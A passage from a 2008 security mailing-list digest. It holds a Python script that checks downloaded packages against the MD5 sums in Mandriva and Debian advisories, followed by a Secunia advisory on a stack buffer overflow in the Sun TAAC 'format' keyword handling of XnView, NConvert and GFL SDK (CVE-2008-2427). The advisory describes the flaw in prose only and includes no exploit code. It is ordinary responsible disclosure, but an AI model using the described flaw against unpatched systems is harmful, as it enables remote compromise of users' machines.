la5y7kPPAA3TiB732x8HYGxbhgGOcSSziZhVHEhTldNTsz+Qj6v1Aw==
=vF5L
-----END PGP SIGNATURE-----
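Both the Mandriva advisory earlier in this digest and the Debian advisory above publish MD5 checksums for their packages, in two layouts: Mandriva prints one `<md5>  <path>` line per file, Debian prints the download URL followed by a `Size/MD5 checksum:` line. Their own tools (urpmi/MandrivaUpdate, apt-get) verify checksums and GPG signatures automatically; the script below is an added example, mine rather than either distribution's, for the case the Debian text also covers, packages fetched by hand with wget. It parses either layout from the advisory text and checks the files in a download directory. The advisory snippet and package files in `demo()` are constructed. One caveat a practitioner should keep in mind: hashes taken from an unsigned copy of an advisory only detect corruption, so the advisory's PGP signature should be checked against the team key first, and MD5 is no longer collision-resistant, which is why the distributions rely on package signatures rather than on the hash alone.

```python
import hashlib
import os
import re
import tempfile

# Mandriva layout:  "<md5>  <relative path>"
MANDRIVA_LINE = re.compile(r"^\s*([0-9a-f]{32})\s+(\S+)\s*$")
# Debian layout: a URL line, then "Size/MD5 checksum: <size> <md5>"
DEBIAN_URL_LINE = re.compile(r"^\s*(https?://\S+)\s*$")
DEBIAN_SUM_LINE = re.compile(r"^\s*Size/MD5 checksum:\s+(\d+)\s+([0-9a-f]{32})\s*$")


def parse_advisory(text):
    """Return {filename: (expected_md5, expected_size_or_None)} from either layout."""
    expected = {}
    pending_url = None
    for line in text.splitlines():
        m = MANDRIVA_LINE.match(line)
        if m:
            md5, relpath = m.groups()
            expected[os.path.basename(relpath)] = (md5, None)
            continue
        m = DEBIAN_URL_LINE.match(line)
        if m:
            pending_url = m.group(1)
            continue
        m = DEBIAN_SUM_LINE.match(line)
        if m and pending_url:
            size, md5 = m.groups()
            expected[os.path.basename(pending_url)] = (md5, int(size))
            pending_url = None
    return expected


def md5_of_file(path):
    """Stream the file so large ISO-sized packages do not need to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_downloads(advisory_text, download_dir):
    """Return {filename: 'ok' | 'missing' | 'size mismatch' | 'md5 mismatch'}."""
    results = {}
    for name, (md5, size) in parse_advisory(advisory_text).items():
        path = os.path.join(download_dir, name)
        if not os.path.exists(path):
            results[name] = "missing"
            continue
        if size is not None and os.path.getsize(path) != size:
            results[name] = "size mismatch"      # cheap check before hashing
            continue
        results[name] = "ok" if md5_of_file(path) == md5 else "md5 mismatch"
    return results


def demo():
    """Constructed download directory and advisory text covering every outcome."""
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "good-1.0.i586.rpm")       # constructed, not a real package
        bad = os.path.join(d, "bad_1.0_amd64.deb")
        short = os.path.join(d, "short_1.0.dsc")
        for p in (good, bad, short):
            with open(p, "wb") as f:
                f.write(b"constructed sample payload\n")   # 27 bytes
        advisory = (
            " Mandriva Linux 2008.1:\n"
            " %s  2008.1/i586/good-1.0.i586.rpm\n" % md5_of_file(good)
            + " %s  2008.1/i586/absent-1.0.i586.rpm\n" % ("0" * 32)
            + "\n"
            "  http://security.example/pool/bad_1.0_amd64.deb\n"
            "    Size/MD5 checksum:       27 %s\n" % ("0" * 32)
            + "  http://security.example/pool/short_1.0.dsc\n"
            "    Size/MD5 checksum:      999 %s\n" % md5_of_file(short)
        )
        return verify_downloads(advisory, d)


if __name__ == "__main__":
    for name, status in sorted(demo().items()):
        print("%-24s %s" % (name, status))
```

Run against a real advisory by passing its text and the directory the packages were saved to; any result other than `ok` means the file should not be installed.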
From: Secunia Research
Date: Fri, 20 Jun 2008 13:53:10 +0100
====================================================================== 

                     Secunia Research 20/06/2008

      - XnView, NConvert, and GFL SDK Sun TAAC Buffer Overflow -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* XnView 1.93.6 for Windows
* XnView 1.70 for Linux and FreeBSD
* NConvert 4.92
* GFL SDK 2.82

NOTE: Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  From remote

====================================================================== 
3) Vendor's Description of Software 

XnView:
"A software to view and convert graphic files, really simple to use!"

Product Link:
http://pagesperso-orange.fr/pierre.g/xnview/enhome.html

NConvert: 
"Come to discover NConvert, a batch utility to convert graphic files!"

Product Link:
http://pagesperso-orange.fr/pierre.g/xnview/en_nconvert.html

GFL SDK:
"GFL SDK is a free library (used by XnView) for developers who would
like to support graphics image formats easily."

Product Link:
http://pagesperso-orange.fr/pierre.g/xnview/engfl.html

====================================================================== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in XnView, NConvert,
and GFL SDK, which can be exploited by malicious people to compromise
a user's system.

The vulnerability is caused due to a boundary error when processing
the "format" keyword of Sun TAAC files. This can be exploited to
cause a stack-based buffer overflow by e.g. tricking a user into
viewing a specially crafted Sun TAAC file.

Successful exploitation allows execution of arbitrary code.

The vulnerability is confirmed in version 1.70 of XnView for Linux
and FreeBSD, XnView 1.93.6 for Windows, GFL SDK 2.82, and NConvert
4.92. Other versions may also be affected.

====================================================================== 
5) Solution 

XnView:
The vulnerability is fixed in version 1.94 beta1.

NConvert and GFL SDK:
A fixed version is not currently available. Do not open untrusted Sun
TAAC files.

====================================================================== 
6) Time Table 

28/05/2008 - Vendor notified.
29/05/2008 - Vendor response.
18/06/2008 - Vendor issues XnView 1.94 beta1.
20/06/2008 - Public disclosure.

====================================================================== 
7) Credits 

Discovered by Stefan Cornelius, Secunia Research.

====================================================================== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2008-2427 for the vulnerability.

====================================================================== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below 
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/ 

====================================================================== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-24/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

